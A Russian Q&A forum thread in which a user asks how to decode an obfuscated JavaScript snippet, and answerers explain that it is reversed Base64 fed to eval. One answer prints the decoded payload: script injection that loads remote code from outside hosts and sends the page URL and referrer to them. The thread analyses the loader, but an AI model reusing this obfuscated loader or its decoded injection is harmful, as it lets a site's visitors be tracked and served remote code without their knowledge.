# Расшифровка кода

Tags: криптография, javascript

Как расшифровать код?

```
var _000 = '==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMJ9EKkxWaoNEZuVGcwFmLJBDMfpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkB SPgkEMw8FIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ 3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLxk0TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETSPBichZ3OnU0MlQHcpJ3Yz9yQzUSRzUiMyUiM0 EDO5EDRzUCZpZ0Ml8ybm5WaukGchFmdhp2LvE0MlAHd0hmMyUCRzUyYyNHMyUiMyUCdwlmcjNVY2FmSyITJENTJldWY1dmbhxGMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
var OOO = ["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x 75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D", "", "x63x68x61x72x41x74", "x69x6Ex64x65x78x4Fx66", "x66x72x6Fx6Dx43x68x61x72x43x6Fx64 x65", "x6Cx65x6Ex67x74x68"];

function OIO(lO1) {
    var O11 = OOO[0];
    var IOO, IOl, Ol1, IlO, Ol0, _0OO, O1l, I0O, OI0 = 0,
        _10O = OOO[1];
    do {
        IlO = O11[OOO[3]](lO1[OOO[2]](OI0++));
        Ol0 = O11[OOO[3]](lO1[OOO[2]](OI0++));
        _0OO = O11[OOO[3]](lO1[OOO[2]](OI0++));
        O1l = O11[OOO[3]](lO1[OOO[2]](OI0++));
        I0O = IlO << 18 | Ol0 << 12 | _0OO << 6 | O1l;
        IOO = I0O >> 16 & 0xff;
        IOl = I0O >> 8 & 0xff;
        Ol1 = I0O & 0xff;
        if (_0OO == 64) {
            _10O += String[OOO[4]](IOO);
        } else {
            if (O1l == 64) {
                _10O += String[OOO[4]](IOO, IOl);
            } else {
                _10O += String[OOO[4]](IOO, IOl, Ol1);
            };
        };
    } while (OI0 < lO1[OOO[5]]);
    return _10O;
};

function _1OO(l1O) {
    var _0lO = OOO[1],
        OI0 = 0;
    for (OI0 = l1O[OOO[5]] - 1; OI0 >= 0; OI0--) {
        _0lO += l1O[OOO[2]](OI0);
    };
    return _0lO;
};
eval(OIO(_1OO(_000)));
```

Comment: Пока в коде вопроса был `<script></script>` - страница разваливалась... XSS однако О_о

Аффтар вопроса - вы читаете что я пишу? Зачем вы опять script прописали? :DDD

Comment: Ничего не редактировал, понятия не имею.

Comment: Приведенный код некорректен  

    Uncaught TypeError: Object  has no method 'x63x68x61x72x41x74'
А вообще, скорее всего достаточно заменить `eval` на `console.log`, чтобы увидеть более вменяемый код.

Answer (score 1):

Здесь никакой криптографии нет, обычное обфусцирование. Восстановление кода делается стандартно

- код форматируется до читаемого вида (jsbeautifier.org и т.п.),
- переменным даются осмысленные значения,
- строки преобразуются в явный вид
- и т.п.

Есть плагины для браузеров, которые упрощают работу, например, [JavaScript Deobfuscator](https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/).

Comment: Только не **плагины**, а **расширения**. Плагин в браузерной терминологии - двоичный подключаемый модуль, обрабатывающий определенный тип MIME.

Answer (score 1):

Переворачивем строку

```
$str = strrev("==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMJ9EKkxWaoNEZuVGcwFmLJBDMfpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkB SPgkEMw8FIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ 3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLxk0TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETSPBichZ3OnU0MlQHcpJ3Yz9yQzUSRzUiMyUiM0 EDO5EDRzUCZpZ0Ml8ybm5WaukGchFmdhp2LvE0MlAHd0hmMyUCRzUyYyNHMyUiMyUCdwlmcjNVY2FmSyITJENTJldWY1dmbhxGMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd");
```

echo base64_decode($str); //выводим результат

вот собственно и результат:

```
var _escape='%3Cscript%20language%3D%22JavaScript%22%20src%3D%22http%3A//javaapi.info/%3Fid%3D198142%22%3E%3C/script%3E';var OI1 = document.createElement('script');
OI1.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var _00I = document.getElementsByTagName('head')[0];
_00I.appendChild(OI1);document.write(unescape(_escape));
```

Answer (score 0):

Судя по характерным сигнатурам это обычная кодировка [Base64](http://ru.wikipedia.org/wiki/Base64) (по крайней мере первая часть). Это никакая не шифровка, а просто способ кодирования бинарных данных набором ASCII символов.

Вторая часть это просто 16-тиричное представление некой строки.

Посмотрите [сюда](http://www.manhunter.ru/webmaster/423_funkcii_base64_na_javascript.html) - там есть пример кодера/декодера Base64

Comment: Только вот '==' в начале, это не BASE64. 

Дальше похоже, но с какого-то места /usr/bin/base64 говорит base64: неверный ввод

Comment: А если '==' в конце ? :) я ответил внизу